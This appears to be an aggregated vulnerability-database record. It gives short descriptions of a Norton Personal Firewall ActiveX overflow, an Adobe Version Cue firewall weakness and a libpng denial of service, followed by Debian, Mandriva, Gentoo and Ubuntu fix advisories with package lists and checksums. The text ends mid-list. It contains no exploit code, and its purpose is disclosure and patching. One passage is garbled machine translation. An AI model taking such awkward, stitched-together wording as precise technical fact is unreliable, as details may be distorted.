VARIoT IoT vulnerabilities database

Buffer overflow in the ISAlertDataCOM ActiveX control in ISLALERT.DLL for Norton Personal Firewall 2004 and Internet Security 2004 allows remote attackers to execute arbitrary code via long arguments to the (1) Get and (2) Set functions. Symantec Norton Personal Firewall is a very popular firewall software. The Get() and Set() functions used by the ISAlertDataCOM function in the ISLALERT.DLL library of Norton Personal Firewall do not correctly verify the input parameters. If the user is tricked into browsing a specially crafted HTML document, it may trigger a buffer overflow, resulting in a login user permissions to execute arbitrary commands

The installer for Adobe Version Cue CS3 Server on Apple Mac OS X, as used in Adobe Creative Suite 3 (CS3), does not re-enable the personal firewall after completing the product installation, which allows remote attackers to bypass intended firewall rules. Adobe Version Cue CS3 Server is prone to a weakness that results from a design error. An attacker could take advantage of this weakness to exploit other vulnerabilities or to carry out a variety of attacks against a computer

The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. This issue affects libpng-0.90 through libpng-1.2.16. This BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1750-1 security@debian.org http://www.debian.org/security/ Florian Weimer March 22, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040 Debian Bug : 446308 476669 516256 512665 Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. (CVE-2008-1382) The png_check_keyword might allow context-dependent attackers to set the value of an arbitrary memory location to zero via vectors involving creation of crafted PNG files with keywords. (CVE-2009-0040) For the old stable distribution (etch), these problems have been fixed in version1.2.15~beta5-1+etch2. For the stable distribution (lenny), these problems have been fixed in version 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and CVE-2009-0040 affect the stable distribution.) For the unstable distribution (sid), these problems have been fixed in version 1.2.35-1. We recommend that you upgrade your libpng packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041 Architecture independent packages: http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73 arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce Architecture independent packages: http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJxnKQAAoJEL97/wQC1SS+7ecIAK6BKrPXLVq6hmj7dJLZWixA 4HMxumeGDUKuJBAxgQzB1jj1y4M3lnNVcVvOSfelxSO8lQLbFH1A3NGOthP1552h sjkFurJBpDDoAQWnfG8pHvUuou7/BWis/E0Av3JCLVV9CBfPHX2QVHHK4MvU/btY fHqm8ye00ae+CIzkpWpPpBJjsGIWOrLGVhrUGVxN/1nwu4cvBRj1Np/sCUo+3A0o OFwc/5RGwh4HMV7E3LyarlDQTkAQ0prMepxDe1mFalz2UA0zgqIZclUvq8JX2Y1S s0WWPLVFu+1uEBkAe4MvhoM7FH3K0NbKsfl214DVasUKFIMTR1kywh44Dho2j7g= =mMEO -----END PGP SIGNATURE----- . The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445 http://www.cert.org/advisories/684664 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 4483193885966f919f283594719a0a90 2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm d13427f7a6494c82a8becec26aaa158f 2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm 86e2b902df20f46bbab8c198be7bb623 2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 80168137deb6e23d5a2fb6e8f3abc2ef 2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm b45baf5195b6ffd1d32b5829ff861b50 2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 9e4f1d18db609adc5c2f92629814e360 2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm Mandriva Linux 2007.1: 300ed9a63f60a1ee16ce4e5caa71f96b 2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm fdd3c3cefc587622382d37cd5fe2795e 2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm d6b13aa08877aec2aaf165203d2a6817 2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: f1289336b45eb58bc2975011086fbfa9 2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm 8dc0504ac8c6ed8e6c5f641c738df144 2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm d0b9f63131ecbfe01db295d15903fd40 2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm Corporate 3.0: 9c0077ae596e6a2340ed6e08ab6c437c corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm 2f44c9f5639aff57948b64cf845efa39 corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm e1638f0497b35341796bb74ccb5a95e7 corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm Corporate 3.0/X86_64: 632b1254a5b2ee4def5ac2f98bc7bd4c corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm b4ad3f3a34be89a22c7bdfcb8b9f351d corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm 419f3faddaeb3cbfa3ca020630858682 corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm Corporate 4.0: a444aa0f9b3c0e5bac0562b3274806a5 corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm 25542984f9b920e9ab9197d383c201b9 corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm a0c238ea1c16f892b704b5055fcc340d corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2ff58096a6a2961e15719aa35107fda6 corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm 78ecdacb1033eecfbf48e464d3106bb1 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 85ee7effc74676da27c1c2c1219b97a7 corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: ea358d9ef4e412851f89abac96d015b7 mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm 3068b2316e8225377b88dcaedbadb878 mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN fefbLet+er8fbszmcgzIKUo= =rUB+ -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities Date: December 12, 2014 Bugs: #196865, #335508, #483632, #508322 ID: 201412-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in AMD64 x86 emulation base libraries, the worst of which may allow remote execution of arbitrary code. Background ========== AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-emulation/emul-linux-x86-baselibs < 20140406-r1 >= 20140406-r1 Description =========== Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All users of the AMD64 x86 emulation base libraries should upgrade to the latest version: # emerge --sync # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1" NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them. References ========== [ 1 ] CVE-2007-0720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720 [ 2 ] CVE-2007-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536 [ 3 ] CVE-2007-2026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026 [ 4 ] CVE-2007-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445 [ 5 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 6 ] CVE-2007-3108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108 [ 7 ] CVE-2007-4995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995 [ 8 ] CVE-2007-5116 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116 [ 9 ] CVE-2007-5135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135 [ 10 ] CVE-2007-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266 [ 11 ] CVE-2007-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268 [ 12 ] CVE-2007-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269 [ 13 ] CVE-2007-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849 [ 14 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 15 ] CVE-2013-0338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338 [ 16 ] CVE-2013-0339 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339 [ 17 ] CVE-2013-1664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664 [ 18 ] CVE-2013-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969 [ 19 ] CVE-2013-2877 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877 [ 20 ] CVE-2014-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-472-1 June 11, 2007 libpng vulnerability CVE-2007-2445 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.2 Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.2 Ubuntu 7.04: libpng12-0 1.2.15~beta5-1ubuntu1 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: It was discovered that libpng did not correctly handle corrupted CRC in grayscale PNG images. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz Size/MD5: 16483 713a6e035fa256e4cb822fb5fc88769b http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc Size/MD5: 652 bc4f3f785816684c54d62947d53bc0db http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb Size/MD5: 846 76eab5d9a96efa186d66cf299a4f6032 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb Size/MD5: 69484 078e25586525c4e83abf08c736fa6bd8 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb Size/MD5: 113888 